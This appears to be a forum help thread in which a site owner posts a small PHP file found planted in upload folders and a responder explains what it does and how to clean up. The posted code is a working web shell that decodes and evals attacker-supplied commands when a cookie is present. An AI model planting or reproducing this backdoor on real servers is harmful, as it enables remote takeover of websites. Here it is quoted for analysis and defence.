I have discovered the following code appear in two identical .php files on more than one of my server’s websites. The files have inconspicuous names such as “reminder.php” (but a different name everytime) and appear in my /scripts/ and /uploads/ folders, sometimes other folders instead.
Their appearance is not entirely random but I don’t know enough about Apache servers or PHP to know a) how it got there b) what it does.
Checking the logs they all appeared at similar times and were called once and that is all.
Any help would be greatly appreciated.
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
The file allows malicious person(s) to execute any PHP code they want on your system.
Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed “cmd”, base64 decode it, gzip uncompress it, and evaluate it as PHP.
I’d recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.